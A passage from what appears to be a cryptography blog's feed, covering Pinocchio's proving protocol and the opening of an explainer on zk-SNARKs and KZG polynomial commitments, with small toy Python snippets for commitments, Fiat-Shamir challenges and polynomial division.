&lt;p&gt;$V_{IO} = E(c_1v_1(s) + c_2v_2(s) + c_3v_3(s))$&lt;br &#x2F;&gt;
$W_{IO} = E(c_1w_1(s) + c_2w_2(s) + c_3w_3(s))$&lt;br &#x2F;&gt;
$Y_{IO} = E(c_1y_1(s) + c_2y_2(s) + c_3y_3(s))$&lt;&#x2F;p&gt;
&lt;p&gt;He performs the following checks&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. $\mathcal B(V, E(\alpha_v), V&amp;#39;) = 1$, $\mathcal B(W, E(\alpha_w), W&amp;#39;) = 1$, $\mathcal B(Y, E(\alpha_y), Y&amp;#39;) = 1$,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. $\mathcal B(VWY, E(\beta), Z)=1$,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. $\mathcal A(V_{IO}V, W_{IO}W, Y_{IO}Y, E(s(s-1)), H) = 1$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;If all checks pass, the verifier gets convinced that the prover executed the circuit with input values $c_1,c_2$ and obtained the output value $c_3$.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;pinocchio-s-protocol&quot;&gt;Pinocchio’s protocol&lt;&#x2F;h3&gt;
&lt;p&gt;Now we give the actual protocol for a general circuit. Suppose the circuit has $n_I$ input values and $n_O$ output values.&lt;&#x2F;p&gt;
&lt;p&gt;As before, let $E$ be the hiding function and $\mathcal A$ and $\mathcal B$ the algorithms to check equations on hidings.&lt;&#x2F;p&gt;
&lt;p&gt;Let $N=n_I + n_O$. Executing the circuit with input values $(c_1,\dots,c_{n_I})$ outputs the values $(c_{n_I+1},\dots, c_{N})$ and all the intermediate values $(c_{N+1}, \dots, c_m)$. Putting these tuples together, we say that $(c_1,\dots,c_m)$ are the values of the execution of the circuit.&lt;&#x2F;p&gt;
&lt;p&gt;In the example, we had $n_I=2, n_O=1$, $N=3$ and therefore executing the circuit with input values $(c_1,c_2)$ produces the output value $c_3$ and the intermediate value $c_4$.&lt;&#x2F;p&gt;
&lt;p&gt;Let $d$ be the number of multiplication gates in the circuit. Let $t = X(X-1)(X-2)\cdots (X-(d-1))$. There exist families of polynomials $v_i,w_i,y_i$, with $i=1,\dots, m$, such that $(c_1,\dots,c_m)$ are the values of the execution of the circuit if and only if $p = vw-y$ is divisible by $t$, where $v=\sum_i c_iv_i$, $w=\sum_ic_iw_i$ and $y=\sum_ic_iy_i$.&lt;&#x2F;p&gt;
&lt;p&gt;In our example $t = X(X-1)$.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;1-setup-1&quot;&gt;1. Setup&lt;&#x2F;h4&gt;
&lt;p&gt;Eight random elements $s, r_v, r_w, \alpha_v, \alpha_w, \alpha_y, \beta, \gamma$ are sampled from $\mathbb F_p$. Let $r_y=r_vr_w$. Two public &lt;em&gt;keys&lt;&#x2F;em&gt; are generated from them: the evaluation key and the verification key&lt;br &#x2F;&gt;
3.1 Evaluation Key: For all $i=N+1,\dots,m$, and for all $j=1,\dots,d-2$&lt;&#x2F;p&gt;
&lt;p&gt;$E(r_vv_i(s)), E(r_ww_i(s)), E(r_yy_i(s)),$&lt;br &#x2F;&gt;
$E(\alpha_vr_vv_i(s)), E(\alpha_wr_ww_i(s)), E(\alpha_yr_yy_i(s)),$&lt;br &#x2F;&gt;
$E(\beta(r_vv_i(s) + r_ww_i(s) + r_yy_i(s))),$&lt;br &#x2F;&gt;
$E(s^j)$&lt;&#x2F;p&gt;
&lt;p&gt;3.2 Verification Key: For all $i=1,\dots, N$&lt;&#x2F;p&gt;
&lt;p&gt;$E(\alpha_v), E(\alpha_w), E(\alpha_y), E(\beta\gamma), E(\gamma)$&lt;br &#x2F;&gt;
$E(r_vv_i(s)),$&lt;br &#x2F;&gt;
$E(r_ww_i(s)),$&lt;br &#x2F;&gt;
$E(r_yy_i(s)),$&lt;br &#x2F;&gt;
$E(t(s))$&lt;&#x2F;p&gt;
&lt;h4 id=&quot;2-proof-generation-1&quot;&gt;2. Proof generation&lt;&#x2F;h4&gt;
&lt;p&gt;The prover executes the circuit with input values $(c_1,\dots,c_{n_I})$ and obtains the values $(c_1,\dots,c_m)$. She computes:&lt;&#x2F;p&gt;
&lt;p&gt;$v = \sum_{i=1}^m c_iv_i$&lt;br &#x2F;&gt;
$w = \sum_{i=1}^m c_iw_i$&lt;br &#x2F;&gt;
$y = \sum_{i=1}^m c_iy_i$&lt;br &#x2F;&gt;
$p = vw - y$&lt;&#x2F;p&gt;
&lt;p&gt;She also computes $h$ such that $p = th$. The polynomial $h$ is of degree at most $d-2$.&lt;br &#x2F;&gt;
The prover computes the following hidings from the evaluation key. Note that all the sums here have $i$ ranging from $N+1$ to $m$. That corresponds to the indices of the intermediate values.&lt;&#x2F;p&gt;
&lt;p&gt;$\pi = (E(\sum_{i=N+1}^mc_ir_vv_i(s)), E(\alpha_v\sum_{i=N+1}^mr_vc_iv_i(s)),$&lt;br &#x2F;&gt;
$E(\sum_{i=N+1}^mc_ir_ww_i(s)), E(\alpha_w\sum_{i=N+1}^mr_wc_iw_i(s)),$&lt;br &#x2F;&gt;
$E(\sum_{i=N+1}^mc_ir_yy_i(s)), E(\alpha_y\sum_{i=N+1}^mr_yc_iy_i(s)),$&lt;br &#x2F;&gt;
$E(\beta \sum_{i=N+1}^m (r_vc_iv_i(s) + r_wc_iw_i(s) + r_yc_iy_i(s))),$&lt;br &#x2F;&gt;
$E(h))$&lt;&#x2F;p&gt;
&lt;p&gt;The prover sends the output values $(c_{n_I+1},\dots,c_N)$ and the proof $\pi$ to the verifier.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;3-verification-1&quot;&gt;3. Verification&lt;&#x2F;h4&gt;
&lt;p&gt;The verifier receives the output values $(c_{n_I+1},\dots, c_N)$ and the proof $\pi = (V, V’, W, W’, Y, Y’, Z, H)$. He computes the input&#x2F;output parts from the verification key. Note that all sums here have $i$ ranging from $1$ to $N$. That corresponds to the input&#x2F;output indices.&lt;&#x2F;p&gt;
&lt;p&gt;$V_{IO} = E(\sum_{i=1}^Nc_ir_vv_i(s))$&lt;br &#x2F;&gt;
$W_{IO} = E(\sum_{i=1}^Nc_ir_ww_i(s))$&lt;br &#x2F;&gt;
$Y_{IO} = E(\sum_{i=1}^Nc_ir_yy_i(s))$&lt;&#x2F;p&gt;
&lt;p&gt;He performs the following checks&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. $\mathcal B(V, E(\alpha_v), V&amp;#39;) = 1$, $\mathcal B(W, E(\alpha_w), W&amp;#39;) = 1$, $\mathcal B(Y, E(\alpha_y), Y&amp;#39;) = 1$,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. $\mathcal A(Z, E(\gamma), E(0), VWY, E(\beta\gamma))=1$,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. $\mathcal A(V_{IO}V, W_{IO}W, Y_{IO}Y, E(t(s)), H) = 1$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * If all checks pass, the verifier gets convinced that the prover executed the circuit with input values $(c_1,\dots,c_{n_I})$ and obtained the output values $(c_{n_I+1}, \dots, c_N)$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;</description>
      </item>
      <item>
          <title>The hunting of the (zk)-SNARK</title>
          <pubDate>Wed, 11 Jan 2023 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/the-hunting-of-the-zk-snark/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/the-hunting-of-the-zk-snark/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/the-hunting-of-the-zk-snark/">&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;&#x2F;h2&gt;
&lt;p&gt;Succinct Non-Interactive Arguments of Knowledge (SNARKs) are powerful cryptographic primitives with applications in decentralized finance, governance, and computation. There are many different SNARKs, such as Marlin (the one Aleo uses), Plonk, STARKs, and Groth16, which differ in the tools they are built on, as well as in performance, proof sizes, verification times, etc. However, they are all based on some common principles and properties. Among SNARKs, the most important ones for private applications are zero-knowledge SNARKs (zk-SNARKs, for short). They allow us to prove that we know certain variables, called the witness, $w$, such that the output of a function $F$ evaluated at the witness and the instance (public variables) $x$ is $F(x,w)=y$, without revealing anything about $w$.&lt;&#x2F;p&gt;
&lt;p&gt;We can convert computer programs to functions receiving input (some of which we may want to conceal) and prove their correct execution with SNARKs. For example, we can transform the program into an arithmetic circuit, $C$, and, given the public input and output, $x$, and confidential data, $w$, we can prove that the program was correctly executed by showing the satisfiability of the circuit, $C(x,w)=0$. Since arithmetic circuit satisfiability is an NP-complete problem, we can reduce any NP problem to an arithmetic circuit (this is not the only alternative, though, and several constructions rely on different techniques).&lt;&#x2F;p&gt;
&lt;p&gt;Before jumping into the details, let us first explain the main properties of a SNARK and the precise meaning of each term in the name. A zk-SNARK involves two parties, the prover and the verifier, where the first one tries to convince the latter of a given statement, such as the prover knows $w$ such that $C(w,x)=0$. The SNARK must fulfill the following:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. Completeness: If the prover knows $w$, he will always be able to convince an honest verifier of the statement&amp;#39;s validity.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. Soundness: if the statement is false, then no cheating prover could convince the verifier to accept, except with very low probability.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. Zero-knowledge: the proof does not reveal anything about the witness.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;As for the name, we have the following:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. Succinctness: the proofs must be short and quick to verify. This property would enable us to delegate expensive computations to untrusted parties and check their validity without running the program ourselves.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. Non-interactive: the scheme requires no interaction between prover and verifier to generate or verify the proof. We will see that the construction relies first on interactive proofs, which we make non-interactive by employing the [Fiat-Shamir](https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Fiat%E2%80%93Shamir_heuristic) transform.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. Argument of knowledge: we can prove with a high probability that we know the witness.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h2 id=&quot;setup&quot;&gt;Setup&lt;&#x2F;h2&gt;
&lt;p&gt;SNARKs require a setup phase to generate public parameters. Among setups, we can distinguish:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Uniform reference string or transparent setups (URS).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Structured reference string or private setup (SRS).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;In the case of SRS, we can find two instances:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Universal (for example, MARLIN)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Specific (Groth 16)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;In practice, the trusted setup is carried out as a multiparty computation; the construction will be secure if there is at least one honest party. The problem with specific SRS is that the string depends on the program, and we must carry out a new setup for each one (this is an undesirable property).&lt;&#x2F;p&gt;
&lt;h2 id=&quot;probabilistic-proofs-and-capabilities-of-the-verifier&quot;&gt;Probabilistic proofs and capabilities of the verifier&lt;&#x2F;h2&gt;
&lt;p&gt;The conciseness of the argument relies on probabilistic proofs. To discuss them, we first have to establish the “powers” or capabilities of the verifier. We have:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Interaction: the verifier can interact with the prover, sending challenges and receiving responses.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Multiprover: there are several provers, but they are isolated.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Randomness: the verifier can select random elements or queries.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Ability to perform queries to an oracle: the verifier may query the prover&amp;#39;s messages.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;When the verifier has access to more than one of these powers, we get different types of proofs:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Interactivity + Randomness: Interactive proofs (IP).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Randomness + Oracle: Probabilistically checkable proofs (PCP).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Interactivity + Randomness + Oracle: Interactive Oracle Proofs (IOP)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;There are other possibilities, such as MIOP, but we will focus on the previous three. IOPs give the most efficient constructions for SNARKs: quasilinear time verification, linear size proof lengths, linear time prover, and efficient implementations. PCPs are interesting from an educational point of view but inefficient in practice (they do not result in succinct proofs, except with linear queries). Finally, IPs give some powerful building blocks in the form of subroutines.&lt;&#x2F;p&gt;
&lt;p&gt;In an IOP, the prover and verifier exchange messages. The prover sends arbitrary messages (in a polynomial IOP, the prover sends commitments to polynomials; see the next section), and the verifier sends random challenges. After some rounds, the verifier queries some values and decides whether to accept or reject the proof.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;commitment-schemes&quot;&gt;Commitment schemes&lt;&#x2F;h2&gt;
&lt;p&gt;The performance of SNARKs depends on the type of commitment used; there have been many advances over the last years to improve them.&lt;&#x2F;p&gt;
&lt;p&gt;We can think of a commitment as a safe box. We make some choice for a bet, store it in a secure container, and hand it to someone else. Once the result is known, we can reveal our selection by opening the safe box.&lt;&#x2F;p&gt;
&lt;p&gt;A commitment has to verify two properties:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Binding: we cannot produce two valid openings for the same commitment. In other words, if we committed to some value $a$, it should be impossible to find $b$ such that $\mathrm{cm}(a)=\mathrm{cm}(b)$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Hiding: the commitment reveals nothing about the committed data.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;One way to commit to a message is by using a &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Cryptographic_hash_function&quot;&gt;collision-resistant hash function&lt;&#x2F;a&gt;. If we have a message $m$ and some random value $r$,&lt;br &#x2F;&gt;
$\mathrm{cm}(m,r)=hash(m\mid r)$&lt;br &#x2F;&gt;
Given that it is collision-resistant, we have the binding property.&lt;br &#x2F;&gt;
We can afterward open the commitment and verify the following:&lt;br &#x2F;&gt;
$\mathrm{Verify}(m,r,\mathrm{cm})\rightarrow$ accept or reject&lt;br &#x2F;&gt;
One advantage of commitments is that they tend to be short. For example, if we use SHA-256, the digest length will be 32 bytes.&lt;&#x2F;p&gt;
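&lt;p&gt;The scheme above can be sketched in a few lines of Python (a toy illustration, not a production commitment; SHA-256 plays the role of the collision-resistant hash, and the message and blinding value are made up):&lt;&#x2F;p&gt;

```python
import hashlib
import secrets

def commit(message, blinding):
    # cm(m, r) = hash(m | r); the random r provides the hiding property
    return hashlib.sha256(message + blinding).digest()

def verify(message, blinding, cm):
    # re-compute the hash and compare against the stored commitment
    return commit(message, blinding) == cm

r = secrets.token_bytes(32)          # fresh randomness per commitment
cm = commit(b"my secret bet", r)
assert verify(b"my secret bet", r, cm)
assert not verify(b"another bet", r, cm)
assert len(cm) == 32                 # SHA-256 digest: 32 bytes
```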
&lt;p&gt;One relevant group of commitments is the polynomial schemes. Here are some constructions and the math that they rely on:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Basic elliptic curves: bulletproofs&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Bilinear groups: Kate-Zaverucha-Goldberg (KZG) polynomial commitments (pairings, trusted setup), DORY (no trusted setup)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Groups of unknown order: DARK&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Hash functions only: FRI&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h2 id=&quot;anatomy-of-a-snark&quot;&gt;Anatomy of a SNARK&lt;&#x2F;h2&gt;
&lt;p&gt;A SNARK can be constructed by selecting the following two elements:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. A type of probabilistic proof: for example, probabilistically checkable proof (PCP) or interactive oracle proof (IOP). A particular kind of IOP is polynomial IOP (PIOP).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. A commitment scheme (cryptography). For example, polynomial&#x2F;functional commitments, vector commitments, and linear encoding.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The probabilistic proof determines the type of computation. It can be either a machine computation (such as vmTinyRam) or a circuit.&lt;&#x2F;p&gt;
&lt;p&gt;The cryptographic element determines the cost to generate the proofs, whether it will be postquantum secure, and the type of setup (transparent or structured). The math tools we need to work with each of them are:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Linear encoding: Elliptic curve pairings (ECP) + Lattices&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Vector commitment: Collision resistant hash (CRH) functions + ECP.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Polynomial commitment: CRH, ECP, prime-order (PO) groups, unknown-order (UO) groups&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;p&gt;Some SNARK recipes are:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. Linear PCP + Linear encoding: Groth16, Groth-Maller 17&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. PCP&#x2F;IOP + vector commitment: STARKs&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. Polynomial PCP&#x2F;IOP + polynomial commitment: MARLIN, SONIC, Plonk, Spartan.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Bulletproofs take different combinations of the elements above and are based on cryptographic sum checks.&lt;&#x2F;p&gt;
&lt;p&gt;The proof’s size depends strongly on the type of construction. For example, for PIOP with KZG polynomial commitments, proofs take less than one kB (two elliptic curve elements). In contrast, IOP with &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;vitalik.ca&#x2F;general&#x2F;2017&#x2F;11&#x2F;22&#x2F;starks_part_2.html&quot;&gt;FRI&lt;&#x2F;a&gt; (Fast Reed-Solomon Interactive Oracle Proofs of Proximity) needs around 100 kB, more than two orders of magnitude more! This difference is because FRI uses Merkle trees; the verification requires an authentication path, needing several hashes.&lt;&#x2F;p&gt;
&lt;p&gt;One problem we face with circuits is that the verifier has to read the whole circuit, resulting in verification time linear in its size (which would make the scheme non-succinct). To avoid this, we can preprocess the circuit and attain sublinear verification times.&lt;&#x2F;p&gt;
&lt;p&gt;We will now focus on the KZG polynomial commitment, which is the basis of Marlin and Plonk.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;kzg-commitment-scheme&quot;&gt;KZG commitment scheme&lt;&#x2F;h2&gt;
&lt;p&gt;The polynomial commitment scheme has the following algorithms:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. Setup.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. Commit.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. Open.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;To commit to a polynomial, we will evaluate the polynomial at a given but unknown point $\alpha$.&lt;&#x2F;p&gt;
&lt;p&gt;The setup takes the maximum degree of the polynomial (which depends on the number of gates of the arithmetic circuit) and outputs the public parameters: proving key and verifying key. To be able to evaluate polynomials, we will use an elliptic curve (we will need it to be &lt;a href=&quot;&#x2F;multiscalar-multiplication-strategies-and-challenges&#x2F;&quot;&gt;pairing friendly&lt;&#x2F;a&gt;, such as BLS 12-377) to hide $\alpha$ and its powers ($\alpha$ is chosen during the setup ceremony and discarded as toxic waste!). To do that, we pick a generator $g$ of a group of large prime order and calculate the $d+1$ elements&lt;br &#x2F;&gt;
$H=\{g,\alpha g, \alpha^2 g, \alpha^3 g,…, \alpha^{d} g\}=\{h_0,h_1,h_2,…,h_{d}\}$&lt;br &#x2F;&gt;
This calculation will give us a vast collection of elliptic curve points (we will save them as a string), which will work as the proving key. In the case of a universal setup, the number of elements will coincide with the maximum size of the circuit. Since elliptic curve points take in the order of $100$ B, if we want to deal with $10^{8}$ gates, we will need more than 1 GB to store it. For a given circuit, which could be much smaller than the maximum, MARLIN trims the key so that it is much simpler and faster to work with. The setup also depends on a security parameter $\lambda$, but we will consider it to be fixed in our analysis.&lt;br &#x2F;&gt;
We therefore have $\mathrm{setup}(\lambda,N)\rightarrow \mathrm{pp(pk,vk)}$.&lt;&#x2F;p&gt;
&lt;p&gt;The prover generates the polynomial $P(x)=p_0+p_1x+…+p_dx^d$ and commits to it by evaluating it at $\alpha$. Since we do not know $\alpha$, only the group elements encoding its powers, the commitment is computed as&lt;br &#x2F;&gt;
$\mathrm{cm}(P)=p_0g+p_1\alpha g+…+p_d\alpha^d g=p_0h_0+p_1h_1+…p_dh_d$&lt;br &#x2F;&gt;
This calculation is the problem of multiscalar multiplication (&lt;a href=&quot;&#x2F;multiscalar-multiplication-strategies-and-challenges&#x2F;&quot;&gt;MSM&lt;&#x2F;a&gt;). We see that the polynomial commitment corresponds to one group element of the elliptic curve.&lt;&#x2F;p&gt;
&lt;p&gt;We could also use a &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Merkle_tree&quot;&gt;Merkle tree&lt;&#x2F;a&gt; to commit to a polynomial. The problem with Merkle trees is that the size of the tree would be dependent on the degree of the polynomial. In the case of KZG, the commitment is just one group element independent of the size. Besides, when we want to evaluate the polynomial in a proof, we need to send all the coefficients in the clear (revealing the polynomial), with the verifier having to do linear work on the size of the polynomial. On the other hand, we will see that KZG mostly hides the polynomial (unless there are lots of queries), and the verification is independent of the degree of the polynomial. Additionally, KZG allows for batch proofs: if we have several commitments $\mathrm{cm}_1$, $\mathrm{cm}_2$, …, $\mathrm{cm}_k$, we can generate a single proof showing that all commitments are valid.&lt;&#x2F;p&gt;
&lt;p&gt;Once the prover commits to the polynomial, the verifier (in an interactive scheme) can send random points $r_k$ to the prover, and the latter gives the polynomial evaluated at $r_k$, $P(r_k)$. To make it non-interactive, we use the Fiat-Shamir transform to generate random challenges from a cryptographic hash function.&lt;&#x2F;p&gt;
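&lt;p&gt;The Fiat-Shamir step can be sketched as follows (a minimal Python illustration, assuming SHA-256 as the hash and a made-up transcript; a real transcript absorbs every commitment and challenge exchanged so far):&lt;&#x2F;p&gt;

```python
import hashlib

def fs_challenge(transcript, modulus):
    # hash the transcript so far to derive the verifier's "random" challenge
    digest = hashlib.sha256(transcript).digest()
    return int.from_bytes(digest, "big") % modulus

# both parties derive the same challenge from the same commitment bytes,
# so no interaction is needed
c1 = fs_challenge(b"commitment to P", 97)
c2 = fs_challenge(b"commitment to P", 97)
assert c1 == c2            # deterministic
assert c1 in range(97)     # a field element in the toy modulus
```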
&lt;p&gt;Suppose the prover wants to convince the verifier that $P(u)=v$. He can transform that equation into a polynomial, $g(x)=P(x)-v$, which has a root at $x=u$. This fact means that $g(x)$ is divisible by $x-u$, which we can write as $g(x)=P(x)-v=Q(x)(x-u)$, where $Q$ is the quotient polynomial. The prover can commit to $Q(x)$ doing the same as before, that is&lt;br &#x2F;&gt;
$\mathrm{cm}(Q)=q_0g+q_1\alpha g+…+q_{d-1}\alpha^{d-1} g=q_0h_0+q_1h_1+…+q_{d-1}h_{d-1}$&lt;br &#x2F;&gt;
which is another MSM. The proof $\pi$ contains this group element: constant size! The proof will show that $P(u)=v$ and $P$ is indeed a polynomial of at most degree $d$ and that the commitment of $P$ is $\mathrm{cm}(P)$.&lt;&#x2F;p&gt;
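&lt;p&gt;The quotient computation can be illustrated with plain field arithmetic in Python (a toy sketch: the modulus $97$ is a stand-in for a real ~256-bit prime, and the elliptic-curve hiding and pairings are omitted):&lt;&#x2F;p&gt;

```python
P_MOD = 97  # toy field modulus; real systems use a ~256-bit prime

def poly_eval(coeffs, x):
    # Horner evaluation; coeffs[i] is the coefficient of x**i
    acc = 0
    for c in reversed(coeffs):
        acc = (acc * x + c) % P_MOD
    return acc

def quotient(coeffs, u, v):
    # synthetic division of P(x) - v by (x - u); exact iff P(u) = v
    a = list(coeffs)
    a[0] = (a[0] - v) % P_MOD
    q = [0] * (len(a) - 1)
    carry = 0
    for i in reversed(range(1, len(a))):
        carry = (a[i] + u * carry) % P_MOD
        q[i - 1] = carry
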